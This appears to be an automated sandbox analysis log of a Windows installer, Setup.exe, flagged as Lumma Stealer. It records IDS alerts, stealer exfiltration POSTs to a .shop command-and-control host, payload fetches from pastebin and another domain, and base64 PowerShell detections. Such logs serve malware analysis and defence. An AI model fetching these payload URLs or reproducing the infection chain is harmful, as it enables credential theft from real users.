      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49869 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49869 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49915 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2025011 - Severity 1 - ET MALWARE Powershell commands sent B64 2 : 104.21.26.127:443 -> 192.168.2.4:49933
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49920 -> 104.21.36.51:443
      Connects to a pastebin service (likely for C&C)
      Source: unknownDNS query: name: pastebin.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 360.netConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Host: klipcatepiu0.shopConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
      Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
      Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49908 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49915 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 104.20.4.235:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.26.127:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.36.51:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1RAEKZ8988RAOBI86KTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BMUZTTW8QX03778CNVLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HC0296BYR822J2FHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KSHMGZNY7X7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5397Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KU5XQ1LN50NAPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1219Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B9DIYYMJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1083Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: toqyxuy.shop
      Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
      Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipcatepiu0.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
      Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipcatepiu0.shop
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 360.netConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Host: klipcatepiu0.shopConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: jQTLvBhCSWe.jQTLvBhCSWe
      Source: global trafficDNS traffic detected: DNS query: toqyxuy.shop
      Source: global trafficDNS traffic detected: DNS query: pastebin.com
      Source: global trafficDNS traffic detected: DNS query: silversky.club
      Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
      Source: global trafficDNS traffic detected: DNS query: www.360.net
      Source: global trafficDNS traffic detected: DNS query: 360.net
      Source: global trafficDNS traffic detected: DNS query: www.baidu.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toqyxuy.shop
      Source: powershell.exe, 00000013.00000002.3520234737.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360.net
      Source: Setup.exeString found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
      Source: Setup.exeString found in binary or memory: http://ccsca2021.ocsp-certum.com05
      Source: Setup.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: Setup.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
      Source: Setup.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
      Source: powershell.exe, 00000013.00000002.3535124573.00000000075A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://klipcatepiu0.shop
      Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000010.00000002.3194182240.0000000006192000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: Setup.exeString found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
      Source: Setup.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: Setup.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
      Source: Setup.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
      Source: powershell.exe, 00000010.00000002.3191251661.0000000005286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000010.00000002.3191251661.0000000005131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000010.00000002.3191251661.0000000005286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
      Source: Setup.exeString found in binary or memory: http://subca.ocsp-certum.com01
      Source: Setup.exeString found in binary or memory: http://subca.ocsp-certum.com02
      Source: Setup.exeString found in binary or memory: http://subca.ocsp-certum.com05
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Attachment.com, 0000000A.00000000.1699207708.0000000000619000.00000002.00000001.01000000.00000007.sdmp, Hart.0.dr, Attachment.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: powershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com
      Source: Setup.exeString found in binary or memory: http://www.bitcomet.com
      Source: Setup.exeString found in binary or memory: http://www.certum.pl/CPS0
      Source: powershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.wshifen.com
      Source: powershell.exe, 00000013.00000002.3520234737.000000000536B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.net
      Source: powershell.exe, 00000013.00000002.3520234737.000000000534F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.000000000536B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.net/
      Source: powershell.exe, 00000010.00000002.3191251661.0000000005131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000013.00000002.3520234737.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_sha.txt
      Source: powershell.exe, 00000010.00000002.3194182240.0000000006192000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://top.baidu.com/board?platform=pc&sa=pcindex_entry
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.360.net
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.360.net/
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: powershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
      Source: powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E4%B8%AD%E5%9B%BD%E6%98%A5%E8%8A%82%E7%9A%84N%E7%A7%8D%E6%89%93%E5%BC%80
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E4%B8%AD%E5%9B%BD%E9%A6%99%E6%B8%AF8-7%E6%88%98%E8%83%9C%E6%97%A5%E6%9C%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E5%A4%9A%E5%9C%B0%E4%B8%AD%E5%B0%8F%E5%AD%A6%E6%A0%A1%E9%95%BF%E6%8E%A5%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E5%AE%9C%E5%AE%B6%E7%9A%84%E6%B2%99%E5%8F%91%E4%B8%8A%E5%B7%B2%E7%BB%8F%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E7%A7%A6%E5%B2%9A%E7%9A%84%E8%BA%AB%E6%9D%90%E5%A4%AA%E7%BB%9D%E4%BA%86&
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E8%A6%81%E5%8A%A0%E5%BC%BA%E9%9D%9E%E7%89%A9%E8%B4%A8%E6%96%87%E5%8C%96%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E9%9F%A9%E5%9B%BD%E5%9B%BD%E4%BC%9A%E6%9C%AA%E9%80%9A%E8%BF%87%E5%B0%B9%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=34%E5%B2%81%E5%A5%B3%E5%AD%90%E5%81%A5%E8%BA%AB4%E5%B9%B4%E7%88%86%E6%94%
      Source: powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=51%E5%B2%81%E4%BB%BB%E6%B3%89%E7%BD%95%E8%A7%81%E7%8E%B0%E8%BA%AB
      Source: Setup.exeString found in binary or memory: https://www.certum.pl/CPS0
      Source: Attachment.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: Hart.0.dr, Attachment.com.1.drString found in binary or memory: https://www.globalsign.com/repository/06
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49869 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49878 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49897 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49902 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49920 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.4:49933 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.4:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.4:49959 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.4:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.4:49979 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: amsi32_7736.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7736, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 8132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\MotivationCenturiesJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\AnContinentJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\OrderingSchedulesJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\HelicopterElectoralJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\WorthyMonthJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\KarenEnvironmentalJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\KdeFinanceJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\BreakdownHighwaysJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004049A80_2_004049A8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0317B35016_2_0317B350
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0317B34216_2_0317B342
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\189943\Attachment.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062CF appears 57 times
      Source: Setup.exeStatic PE information: invalid certificate
      Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: Commandline size = 9453
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: Commandline size = 9453Jump to behavior
      Source: amsi32_7736.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 7736, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 8132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/28@9/5
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
